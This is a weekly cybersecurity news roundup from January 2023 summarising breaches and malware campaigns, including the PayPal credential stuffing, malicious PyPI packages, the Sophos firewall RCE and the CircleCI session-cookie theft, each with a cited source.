Thursday, January 19th, 2023
Cybersecurity Week in Review (20/1/23)
PayPal accounts breached in large-scale credential stuffing attack
PayPal is sending out data breach notifications to thousands of users who had their accounts accessed through credential stuffing attacks that exposed some personal data.
Credential stuffing are attacks where hackers attempt to access an account by trying out username and password pairs sourced from data leaks on various websites. This type of attack relies on an automated approach with bots running lists of credentials to “stuff” into login portals for various services. Credential stuffing targets users that employ the same password for multiple online accounts, which is known as “password recycling.”
PayPal explains that the credential stuffing attack occurred between December 6 and December 8, 2022. The company detected and mitigated it at the time but also started an internal investigation to find out how the hackers obtained access to the accounts. By December 20, 2022, PayPal concluded its investigation, confirming that unauthorised third parties logged into the accounts with valid credentials. The electronic payments platform claims that this was not due to a breach on its systems and has no evidence that the user credentials were obtained directly from them.
According to the data breach reporting from PayPal, 34,942 of its users have been impacted by the incident. During the two days, hackers had access to account holders’ full names, dates of birth, postal addresses, social security numbers, and individual tax identification numbers. Transaction histories, connected credit or debit card details, and PayPal invoicing data are also accessible on PayPal accounts.
PayPal says it took timely action to limit the intruders’ access to the platform and reset the passwords of accounts confirmed to have been breached. Also, the notification claims that the attackers have not attempted or did not manage to perform any transactions from the breached PayPal accounts.
Impacted users will receive a free-of-charge two-year identity monitoring service from Equifax. The company strongly recommends that recipients of the notices change the passwords for other online accounts using a unique and long string. Typically, a good password is at least 12-characters long and includes alphanumeric characters and symbols.
Source – https://www.bleepingcomputer.com/news/security/paypal-accounts-breached-in-large-scale-credential-stuffing-attack/
MailChimp discloses new breach after employees got hacked
Email marketing firm MailChimp suffered another breach after hackers accessed an internal customer support and account administration tool, allowing the threat actors to access the data of 133 customers.
MailChimp says the attack was first detected on Jan 11th and determined that attackers gained access to employee credentials after conducting a social engineering attack on Mailchimp employees and contractors. Affected accounts were temporarily suspended and primary contacts were notified.
MailChimp did not go into detail about the extent of the attack or what details were compromised but they did share that no credit card or password information was compromised as a result of the incident. One of the customers affected by this breach is the popular WooCommerce eCommerce plugin for WordPress. WooCommerce has emailed customers warning them that the MailChimp breach exposed their names, store URLs, addresses, and email addresses. While WooCommerce states that there is no indication that the stolen data has been misused, threat actors commonly use this type of data for targeted phishing attacks to steal credentials or install malware.
In April 2022, Trezor hardware wallet owners began receiving fake data breach notifications prompting customers to download a fake Trezor Suite software that would steal their recovery seeds. Trezor said on Twitter that the mailing list used in this phishing campaign was a Trezor mailing list stolen in a breach on MailChimp.
MailChimp later confirmed that the breach was more extensive, with employees falling for a social engineering attack that allowed threat actors to access 319 MailChimp accounts and export the data from 102 customers. The marketing company confirmed that this data was being used in phishing emails but declined to share more information about the attacks.
Source – https://www.bleepingcomputer.com/news/security/mailchimp-discloses-new-breach-after-employees-got-hacked/
Earth Bogle Campaign Unleashes NjRAT Trojan on Middle East and North Africa
An ongoing campaign dubbed Earth Bogle is leveraging geopolitical-themed lures to deliver the NjRAT remote access trojan to victims across the Middle East and North Africa.
The threat actor uses public cloud storage services such as files[.]fm and failiem[.]lv to host malware, while compromised web servers distribute NjRAT. Phishing emails, typically tailored to the victim’s interests, are loaded with malicious attachments to activate the infection routine. This takes the form of a Microsoft Cabinet (CAB) archive file containing a Visual Basic Script dropper to deploy the next-stage payload.
Alternatively, it’s suspected that the files are distributed via social media platforms such as Facebook and Discord, in some cases even creating bogus accounts to serve ads on pages impersonating legitimate news outlets. The CAB files, hosted on cloud storage services, also masquerade as sensitive voice recordings to entice the victim into opening the archives, only for the VBScript to be executed, leading to the retrieval of another VBScript file that masks itself as an image file. The second-stage VBScript, for its part, fetches from an already breached domain a PowerShell script that’s responsible for loading the RAT payload into memory and executing it.
NjRAT (aka Bladabindi), first discovered in 2013, has myriad capabilities that allow the threat actor to harvest sensitive information and gain control over compromised computers. This case demonstrates that threat actors will leverage public cloud storage as malware file servers, combined with social engineering techniques appealing to people’s sentiments such as regional geopolitical themes as lures, to infect targeted populations.
Source – https://thehackernews.com/2023/01/earth-bogle-campaign-unleashes-njrat.html
1000 Shipping Vessels Impacted by Ransomware Attack
DNV, a Norwegian software supplier that provides services for 12,000 ships and mobile offshore units across the globe, said its ShipManager software had been hit by a cyber-attack on January 7, 2023. Around 1000 shipping vessels have been impacted by the attack.
Consequently, around 70 customers operating the roughly 1000 vessels have been impacted. These customers have been advised to consider relevant mitigating measures depending on the types of data they have uploaded to the system. DNV added that it had informed the impacted parties about their responsibility to notify the relevant data protection authorities in their countries of the incident. However, the firm said there are no indications that any other data or servers by DNV are affected and the server outage has not impacted any of its other services.
Additionally, the incident has not affected the vessels’ ability to operate. This is because they can still use the onboard, offline functionalities of the ShipManager software. Also, other systems on the impacted ships remain unaffected.
DMV has reported the attack to the Norwegian Police, which is liaising with other relevant government agencies, including the Norwegian Data Protection Authority (Datatilsynet) and the German Cyber Security Authority (BSI).
The maritime industry has been hit by a number of high-profile cyber incidents in recent years, with the potential to cause substantial economic disruption making it a tempting target for extortion campaigns. Many ships also contain aging technological infrastructure, making them particularly vulnerable to vectors like ransomware.
The increasing interconnectedness of physical and digital systems in sectors like shipping is making incidents of this nature harder to mitigate. Unfortunately, attacks that impact the critical infrastructure industry are increasing as they add more digital transformation and connected cyber-physical systems to their networks without the right protection tools.
Source – https://www.infosecurity-magazine.com/news/shipping-vessels-ransomware-attack/
Researchers Uncover 3 PyPI Packages Spreading Malware to Developer Systems
A threat actor by the name Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that are designed to drop malware on compromised developer systems.
The packages – named colorslib (versions 4.6.11 and 4.6.12), httpslib (versions 4.6.9 and 4.6.11), and libhttps (version 4.6.12) – were uploaded by the author between January 7, 2023, and January 12, 2023. They have since been yanked from PyPI but not before they were cumulatively downloaded over 550 times. The modules come with identical setup scripts that are designed to invoke PowerShell and run a malicious binary (“Oxzy.exe”) hosted on Dropbox.
The executable, once launched, triggers the retrieval of a next-stage, also a binary named update.exe, that runs in the Windows temporary folder (“%USER%\AppData\Local\Temp\”). update.exe is flagged by antivirus vendors on VirusTotal as an information stealer that’s also capable of dropping additional binaries, one of which is detected by Microsoft as Wacatac. The Windows maker describes the trojan as a threat that can perform a number of actions of a malicious hacker’s choice on your PC including delivering ransomware and other payloads.
The disclosure arrives weeks after two other rogue packages by the names of Shaderz and aioconsol that harbor similar capabilities to gather and exfiltrate sensitive personal information were detected. The findings once again demonstrate the steady stream of malicious activity recorded in popular open-source package repositories, wherein threat actors are taking advantage of the trust relationships to plant tainted code in order to amplify and extend the reach of the infections.
Users are advised to exercise caution when it comes to downloading and running packages from untrusted authors to avoid falling prey to supply chain attacks.
Source – https://thehackernews.com/2023/01/researchers-uncover-3-pypi-packages.html
Ireland tops EU league table for data fines
Ireland has topped a league table of EU countries with aggregate data breach fines imposed to date totalling more than €1 billion.
According to the latest GDPR and Data Breach Survey from law firm DLA Piper, Luxembourg is in second position, with the highest individual fine of €746 million which was issued in 2021. The report finds that 2022 was another record year with European data regulators issuing €2.9 billion in GDPR fines last year. This was more than double the value of fines issued in 2021.
The year’s highest fine of €405 million was imposed by the Irish Data Protection Commission (DPC) against Meta for breaches by Instagram relating to children’s personal data. Meta is currently appealing the decision in the High Court.
The survey looks at data fines issued since 28 January 2022 and covers all 27 EU member states as well as the UK, Norway, Iceland, and Liechtenstein. It found that the average number of notified data breaches per day fell slightly from 328 to 300.
“With data protection enforcement on the rise, it is probably no coincidence that organisations are increasingly cautious around when and how they report data breaches to regulators,” said John Magee, Partner and Head of Data Protection, Privacy & Information Security at DLA Piper Ireland. ‘’ The fear of investigations, fines, and compensation claims is likely driving what is a small but significant reduction in breach reporting numbers,” he added.
Source – https://www.rte.ie/news/business/2023/0117/1349063-data-breach-fines/
Over 4,000 Sophos Firewall devices vulnerable to RCE attacks
Over 4,000 Sophos Firewall appliances exposed to Internet access are vulnerable to attacks targeting a critical remote code execution (RCE) vulnerability.
Sophos disclosed this code injection flaw (CVE-2022-3236) found in the User Portal and Webadmin of Sophos Firewall in September and also released hotfixes for multiple Sophos Firewall versions (official fixes were issued three months later, in December 2022). The company warned at the time that the RCE bug was being exploited in the wild in attacks against organisations from South Asia.
The September hotfixes rolled out to all affected instances (v19.0 MR1/19.0.1 and older) since automatic updates are enabled by default — unless an administrator disabled the option. Sophos Firewall instances running older product versions had to be upgraded manually to a supported version to receive the CVE-2022-3236 hotfix automatically. Admins who cannot patch the vulnerable software can also remove the attack surface by disabling WAN access to the User Portal and Webadmin.
However, a recent scan discovered that out of more than 88,000 instances, around 6% or more than 4,000 are running versions that haven’t received a hotfix and are vulnerable to CVE-2022-3236 attacks. Luckily, despite already being exploited as a zero-day, a CVE-2022-3236 proof-of-concept exploit is yet to be published online. However, it was possible to reproduce the exploit from technical information shared by Trend Micro’s Zero Day Initiative (ZDI), so it is likely that threat actors will soon be able to as well.
When and if this happens, that will most likely lead to a new wave of attacks as soon as threat actors create a fully working version of the exploit and add it to their tool set. Mass exploitation would likely be hindered by Sophos Firewall requiring web clients by default to solve a captcha during authentication. To workaround this limitation and reach the vulnerable code, attackers would have to include an automated CAPTCHA solver.
Patching Sophos Firewall bugs is critically important, given that this wouldn’t be the first time such a vulnerability is exploited in the wild. In March 2022, Sophos patched a similar critical Sophos Firewall bug (CVE-2022-1040) in the User Portal and Webadmin modules that enabled authentication bypass and arbitrary code execution attacks. It was also exploited in attacks as a zero-day since early March (roughly three weeks before Sophos released patches) against South Asian organisations by a Chinese threat group tracked as DriftingCloud.
Source – https://www.bleepingcomputer.com/news/security/over-4-000-sophos-firewall-devices-vulnerable-to-rce-attacks/
New Backdoor Created Using Leaked CIA’s Hive Malware Discovered in the Wild
Unidentified threat actors have deployed a new backdoor that borrows its features from the U.S. Central Intelligence Agency (CIA)’s Hive multi-platform malware suite, the source code of which was released by WikiLeaks in November 2017.
This is the first time a variant of the CIA Hive attack kit has been caught in the wild, and it was named xdr33 based on its embedded Bot-side certificate CN=xdr33. xdr33 is said to be propagated by exploiting an unspecified N-day security vulnerability in F5 appliances. It communicates with a command-and-control (C2) server using SSL with forged Kaspersky certificates.
The intent of the backdoor, is to harvest sensitive information and act as a launchpad for subsequent intrusions. It improves upon Hive by adding new C2 instructions and functionalities, among other implementation changes. The ELF sample further operates as a Beacon by periodically exfiltrating system metadata to the remote server and executing commands issued by the C2. This includes the ability to download and upload arbitrary files, run commands using cmd, and launch shell, in addition to updating and erasing traces of itself from the compromised host.
The malware also incorporates a Trigger module that’s designed to eavesdrop on network traffic for a specific trigger packet in order to extract the C2 server mentioned in the IP packet’s payload, establish connection, and wait for the execution of commands sent by the C2.
It is worth noting that Trigger C2 differs from Beacon C2 in the details of communication; after establishing an SSL tunnel, [the] bot and Trigger C2 use a Diffie-Helllman key exchange to establish a shared key, which is used in the AES algorithm to create a second layer of encryption.
Source – https://thehackernews.com/2023/01/new-backdoor-created-using-leaked-cias.html
Nissan data breach exposed clients’ full names and dates of birth
Nissan North America started informing customers of a data breach at a third-party service provider that leaked customer information.
Nissan disclosed a data breach that affected close to 18k of the company’s clients. According to the notice of data breach Nissan sent to affected customers, user data leaked via a third-party vendor that provided software development services to the automaker. According to the company, the leaked data included the company’s users’ names, dates of birth, and Nissan Motor Acceptance Company (NMAC) number.
Nissan first learned that specific data it gave to the vendor was inadvertently exposed on June 21, 2022. Three months later, on September 26, 2022, the company’s investigation led the firm to believe that the incident resulted in unauthorised access to user data. Specifically, the data embedded within the code during software testing was unintentionally and temporarily stored in a cloud-based public repository. This information did not include Social Security numbers or credit card information.
Even though Nissan first learned about the breach in late June, the company only disclosed the breach on January 16, 2023, almost six months later. Nissan’s sluggish behavior mimics other companies lagging to inform people somebody has stolen their data. For example, it took Five Guys, a popular American fast-food chain, close to three months to inform its employees that threat actors might have accessed their sensitive data, such as Social Security numbers (SSNs).
Source – https://cybernews.com/news/nissan-data-breach-exposed-full-names/?
Raccoon and Vidar Stealers Spreading via Massive Network of Fake Cracked Software
A large infrastructure comprising over 250 domains is being used to distribute information-stealing malware such as Raccoon and Vidar since early 2020.
The infection chain has been identified using about a hundred fake cracked software catalogue websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub. The domains are thought to be operated by a threat actor running a traffic direction system (TDS), which allows other cybercriminals to rent the service to distribute their malware.
The attacks target users searching for cracked versions of software and games on search engines like Google, surfacing fraudulent websites on top by leveraging a technique called search engine optimisation (SEO) poisoning to lure victims into downloading and executing the malicious payloads. The poisoned result comes with a download link to the promised software that, upon clicking, triggers a five-stage URL redirection sequence to take the user to a web page displaying a shortened link, which points to a password-protected RAR archive file hosted on GitHub, along with its password.
Using several redirections complicates automated analysis by security solutions. Carving the infrastructure as such is designed to ensure resilience, making it easier and quicker to update or change a step.
Should the victim uncompress the RAR archive and run the purported setup executable contained within it, either of the two malware families, Raccoon or Vidar, are installed on the system. Both pieces of malware are equipped to siphon a wide range of personal information from compromised machines, harvest credentials from web browsers, and steal data from various cryptocurrency wallets.
Users are advised to refrain from downloading pirated software and enforce multi-factor authentication wherever possible to harden accounts.
Source – https://thehackernews.com/2023/01/raccoon-and-vidar-stealers-spreading.html
CircleCI’s hack caused by malware stealing engineer’s 2FA-backed session
Hackers breached CircleCi in December after an engineer became infected with information-stealing malware that their 2FA-backed SSO session cookie allowed access to the company’s internal systems.
Earlier this month, CircleCi disclosed that they suffered a security incident and warned customers to rotate their tokens and secrets. In a new security incident report on the attack, CircleCi concluded that an engineer had become infected on December 16th with information-stealing malware that the company’s antivirus software did not detect.
This malware was able to steal a corporate session cookie that had already been authenticated via 2FA, allowing the threat actor to log in as the user without having to authenticate via 2FA again. The malware was able to execute session cookie theft, enabling them to impersonate the targeted employee in a remote location and then escalate access to a subset of our production systems.
Using the engineer’s privileges, CircleCi says the hacker began stealing data on December 22nd from some of the company’s databases and stores, including customer’s environment variables, tokens, and keys. While CircleCi encrypted the data at rest, the hacker also stole encryption keys by dumping them from running processes, potentially allowing the threat actor to decrypt the encrypted, stolen data.
After learning of the data theft, the company began alerting customers via email about the incident, warning them to rotate all tokens and secrets if they had logged in between December 21st, 2022, and January 4th, 2023.
In response to the attack, CircleCi says they rotated all tokens associated with their customers, including Project API Tokens, Personal API Tokens, and GitHub OAuth tokens. The company also worked with Atlassian and AWS to notify customers of possibly compromised Bitbucket tokens and AWS tokens. To further strengthen their infrastructure, CircleCi says they added further detections for the behavior exhibited by the information-stealing malware to their antivirus and mobile device management (MDM) systems.
The company also further restricted access to its production environments to a smaller subset of people and increased the security of its 2FA implementation.
Source – https://www.bleepingcomputer.com/news/security/circlecis-hack-caused-by-malware-stealing-engineers-2fa-backed-session/